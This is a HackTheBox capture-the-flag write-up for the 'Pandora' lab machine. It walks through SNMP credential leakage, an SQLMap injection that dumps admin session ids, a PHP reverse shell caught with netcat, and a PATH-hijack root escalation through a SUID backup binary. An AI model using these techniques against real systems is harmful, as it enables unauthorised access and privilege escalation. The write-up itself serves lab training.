This is my first writeup for a HackTheBox machine, as I usually do them on my own without documenting it, so I will try to be clear on every choice I make.
As per usual, let us start with an aggressive NMAP scan and see what we can do.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 21:17 CEST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.036s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 36.03 ms 10.10.14.1
2 36.13 ms pandora.htb (10.10.11.136)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds
Well, that is not really useful, but looks like there is a web app on port 80. We can see an interesting vhost called panda.htb, so let us add that to our /etc/hosts file.
Not much that we can do in the root page, other than a form that is useless to try XSS on, so let us throw a quick gobuster and ffuf scan for directories and subdomains, respectively
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://panda.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/17 21:21:25 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
/server-status (Status: 403) [Size: 274]
===============================================================
2022/04/17 21:24:11 Finished
===============================================================
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fw 13127
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://panda.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.panda.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 13127
________________________________________________
:: Progress: [4990/4990] :: Job [1/1] :: 784 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Well that is dissapointing, after that I decided to go back to NMAP for a UDP scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 21:26 CEST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:26
Scanning panda.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 21:26, 0.09s elapsed (1 total hosts)
Initiating UDP Scan at 21:26
Scanning panda.htb (10.10.11.136) [1000 ports]
Increasing send delay for 10.10.11.136 from 0 to 50 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.136 from 50 to 100 due to max_successful_tryno increase to 6
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.136 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 8.34% done; ETC: 21:32 (0:05:41 remaining)
Increasing send delay for 10.10.11.136 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.136 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 11.94% done; ETC: 21:34 (0:07:30 remaining)
UDP Scan Timing: About 14.74% done; ETC: 21:36 (0:08:46 remaining)
UDP Scan Timing: About 17.66% done; ETC: 21:37 (0:09:24 remaining)
Verbosity Increased to 2.
Stats: 0:04:52 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 33.84% done; ETC: 21:40 (0:09:31 remaining)
UDP Scan Timing: About 41.03% done; ETC: 21:41 (0:08:47 remaining)
UDP Scan Timing: About 47.49% done; ETC: 21:41 (0:08:02 remaining)
UDP Scan Timing: About 53.50% done; ETC: 21:41 (0:07:14 remaining)
UDP Scan Timing: About 59.21% done; ETC: 21:42 (0:06:25 remaining)
UDP Scan Timing: About 64.61% done; ETC: 21:42 (0:05:37 remaining)
UDP Scan Timing: About 70.01% done; ETC: 21:42 (0:04:48 remaining)
UDP Scan Timing: About 75.21% done; ETC: 21:42 (0:04:00 remaining)
Discovered open port 161/udp on 10.10.11.136
Perfect, finally we got something, so let us move onto the scanning.
Knowing the 161 SNMP UDP port is open, we should try an enumerating tool like SNMPWalk and see what we can get.
iso.3.6.1.2.1.25.4.2.1.5.833 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.858 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.861 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.863 = ""
iso.3.6.1.2.1.25.4.2.1.5.865 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.914 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.936 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.976 = ""
iso.3.6.1.2.1.25.4.2.1.5.1133 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1161 = ""
iso.3.6.1.2.1.25.4.2.1.5.1183 = STRING: "--user"
So finally we have some creds, now we can SSH as daniel user.
From enumerating a bit, we can see there is another web application running on the server
daniel@pandora:~$ ls /var/www
html pandora
daniel@pandora:~$ ls /var/www/pandora/
index.html pandora_console
daniel@pandora:~$ ls /var/www/pandora/pandora_console/
ajax.php composer.lock Dockerfile godmode mobile pandora_console_logrotate_ubuntu tests
attachment COPYING extensions images operation pandora_console_upgrade tools
audit.log DB_Dockerfile extras include pandora_console.log pandoradb_data.sql vendor
AUTHORS DEBIAN fonts index.php pandora_console_logrotate_centos pandoradb.sql ws.php
composer.json docker_entrypoint.sh general install.done pandora_console_logrotate_suse pandora_websocket_engine.service
daniel@pandora:~$
But it is not open to the public, so we will have to do some port forwarding to our local machine. There is many ways to do this, but I will do it through SSH
ssh daniel@panda.htb -L 9999:127.0.0.1:80
daniel@panda.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 17 Apr 20:10:47 UTC 2022
System load: 0.0
Usage of /: 63.4% of 4.87GB
Memory usage: 10%
Swap usage: 0%
Processes: 230
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:33a4
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Apr 17 20:10:30 2022 from 10.10.15.195
daniel@pandora:~$
So we are greeted with a web application named "Pandora FMS" and a login form. Looking it up on google looks as if there is multiple vulnerabilities on it; one of them unauthenticated SQL injection on /include/chart_generator.php so let us try that.
The vulnerable URI is "http://localhost:9999/pandora_console/include/chart_generator.php?session_id=test", knowing that, let us intercept the request with Burp, save it to a "request.txt" file and feed it to SQLMap.
[23:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:13:00] [INFO] fetching database names
[23:13:00] [INFO] retrieved: 'information_schema'
[23:13:00] [INFO] retrieved: 'pandora'
available databases [2]:
[*] information_schema
[*] pandora
Let us see what is in the pandora DB
Database: pandora
[178 tables]
+------------------------------------+
| taddress |
| taddress_agent |
| tagent_access |
| tagent_custom_data |
| tagent_custom_fields |
| tagent_custom_fields_filter |
| tagent_module_inventory |
| tagent_module_log |
| tagent_repository |
| tagent_secondary_group |
| tagente |
| tagente_datos |
| tagente_datos_inc |
| tagente_datos_inventory |
| tagente_datos_log4x |
| tagente_datos_string |
| tagente_estado |
| tagente_modulo |
| talert_actions |
| talert_commands |
| talert_snmp |
| talert_snmp_action |
| talert_special_days |
| talert_template_module_actions |
| talert_template_modules |
| talert_templates |
| tattachment |
| tautoconfig |
| tautoconfig_actions |
| tautoconfig_rules |
| tcategory |
| tcluster |
| tcluster_agent |
| tcluster_item |
| tcollection |
| tconfig |
| tconfig_os |
| tcontainer |
| tcontainer_item |
| tcredential_store |
| tdashboard |
| tdatabase |
| tdeployment_hosts |
| tevent_alert |
| tevent_alert_action |
| tevent_custom_field |
| tevent_extended |
| tevent_filter |
| tevent_response |
| tevent_rule |
| tevento |
| textension_translate_string |
| tfiles_repo |
| tfiles_repo_group |
| tgis_data_history |
| tgis_data_status |
| tgis_map |
| tgis_map_connection |
| tgis_map_has_tgis_map_con |
| tgis_map_layer |
| tgis_map_layer_groups |
| tgis_map_layer_has_tagente |
| tgraph |
| tgraph_source |
| tgraph_source_template |
| tgraph_template |
| tgroup_stat |
| tgrupo |
| tincidencia |
| titem |
| tlanguage |
| tlayout |
| tlayout_data |
| tlayout_template |
| tlayout_template_data |
| tlink |
| tlocal_component |
| tlog_graph_models |
| tmap |
| tmensajes |
| tmetaconsole_agent |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event |
| tmetaconsole_event_history |
| tmetaconsole_setup |
| tmigration_module_queue |
| tmigration_queue |
| tmodule |
| tmodule_group |
| tmodule_inventory |
| tmodule_relationship |
| tmodule_synth |
| tnetflow_filter |
| tnetflow_report |
| tnetflow_report_content |
| tnetwork_component |
| tnetwork_component_group |
| tnetwork_map |
| tnetwork_matrix |
| tnetwork_profile |
| tnetwork_profile_component |
| tnetworkmap_ent_rel_nodes |
| tnetworkmap_enterprise |
| tnetworkmap_enterprise_nodes |
| tnews |
| tnota |
| tnotification_group |
| tnotification_source |
| tnotification_source_group |
| tnotification_source_group_user |
| tnotification_source_user |
| tnotification_user |
| torigen |
| tpassword_history |
| tperfil |
| tphase |
| tplanned_downtime |
| tplanned_downtime_agents |
| tplanned_downtime_modules |
| tplugin |
| tpolicies |
| tpolicy_agents |
| tpolicy_alerts |
| tpolicy_alerts_actions |
| tpolicy_collections |
| tpolicy_groups |
| tpolicy_modules |
| tpolicy_modules_inventory |
| tpolicy_plugins |
| tpolicy_queue |
| tprofile_view |
| tprovisioning |
| tprovisioning_rules |
| trecon_script |
| trecon_task |
| trel_item |
| tremote_command |
| tremote_command_target |
| treport |
| treport_content |
| treport_content_item |
| treport_content_item_temp |
| treport_content_sla_com_temp |
| treport_content_sla_combined |
| treport_content_template |
| treport_custom_sql |
| treport_template |
| treset_pass |
| treset_pass_history |
| tserver |
| tserver_export |
| tserver_export_data |
| tservice |
| tservice_element |
| tsesion |
| tsesion_extended |
| tsessions_php |
| tskin |
| tsnmp_filter |
| ttag |
| ttag_module |
| ttag_policy_module |
| ttipo_modulo |
| ttransaction |
| ttrap |
| ttrap_custom_values |
| tupdate |
| tupdate_journal |
| tupdate_package |
| tupdate_settings |
| tuser_double_auth |
| tuser_task |
| tuser_task_scheduled |
| tusuario |
| tusuario_perfil |
| tvisual_console_elements_cache |
| twidget |
| twidget_dashboard |
+------------------------------------+
Well that is quite the database. Knowing we are after a session_id, there is a table named "tsessions_php", so let's dump it.
Database: pandora
Table: tsessions_php
[48 entries]
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 2fb6a6ofi5c5gr9rih6q6eajet | NULL | 1650231355 |
| 2g39hkugj5sdg2qalgpgvml63o | NULL | 1650230954 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 541b95na0fcmcsp6opljhojpfs | NULL | 1650231187 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 66dtfimfsu71u6bfjbv7j5h9rd | id_usuario|s:6:"daniel"; | 1650230562 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6fs5onipp61e4vkt5hjnhd3lc8 | id_usuario|s:6:"daniel"; | 1650231114 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| f2sban0efcc1ecfin3dhoi88sl | NULL | 1650231232 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| jvk5c5s8rqq01grfeo77mer347 | id_usuario|s:6:"daniel"; | 1650231010 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| p5s49h43f3gep5n5iat3skr6f4 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;csrf_code|s:32:"96bc1528afb4e66a70ed22648bb8bd97"; | 1650231045 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| u7d6e9rvfheg1lee434g3c4g21 | NULL | 1650230876 |
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
Now we have an admin session id, so let us try it on the web app.
Perfect, we are logged in as admin. So after looking a bit on what it can be done to make a reverse shell, I found a File Manager in the Admin Tools section that looks like could be used for this.
As always, my go to reverse shell for php is this one.
Finally we invoke it at "http://localhost:9999/pandora_console/images/reverse.php" and we are in as a more privileged user.
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
21:44:03 up 22 min, 3 users, load average: 0.03, 0.04, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.16.81 21:23 3:42 0.04s 0.04s -bash
daniel pts/1 10.10.15.195 21:23 20:07 0.03s 0.03s -bash
matt pts/2 10.10.16.81 21:40 43.00s 0.05s 0.05s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
matt@pandora:/$ ^Z
zsh: suspended nc -lvp 1337
┌──(max㉿1337)-[~/pandora]
└─$ stty raw -echo;fg
[1] + continued nc -lvp 1337
matt@pandora:/$ stty rows 50 columns 200
matt@pandora:/$ ls
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt proc root run sbin srv sys tmp usr var
matt@pandora:/$
Grab the flag in matt's home directory and let us move onto root escalation.
Enumerating SUID binaries we can see a suspicious one.
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
matt@pandora:/home/matt$
pandora_backup is not a standard SUID binary, so maybe we can do something with that.
matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/home/matt$
Looks like it uses tar to process the backup; it does not use the full path (/usr/bin/tar) but the relative one, and since it is executed as root from the SUID permission perhaps we can inject our own malicious tar binary casting a shell. Let us try it and see.
matt@pandora:/$ cd tmp
matt@pandora:/tmp$ ls
systemd-private-96b823f80e9d4a64975446ca9f676852-apache2.service-43l5Ai
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-logind.service-WUJXYf
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-resolved.service-a18hBi
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-timesyncd.service-AglMTe
vmware-root_713-4290166671
matt@pandora:/tmp$ mkdir root
matt@pandora:/tmp$ cd root
matt@pandora:/tmp/root$ ls
matt@pandora:/tmp/root$ echo "/bin/bash">tar
matt@pandora:/tmp/root$ chmod +x tar
matt@pandora:/tmp/root$ export PATH=/tmp/root:$PATH
matt@pandora:/tmp/root$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp/root# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp/root#
Note: you are gonna need a SSH shell for this as the reverse shell did not work for me, so generate a key pair and append your public key in /home/matt/.ssh/authorized_keys.
Perfect, now just grab the flag from /root/root.txt. Hope you enjoyed it!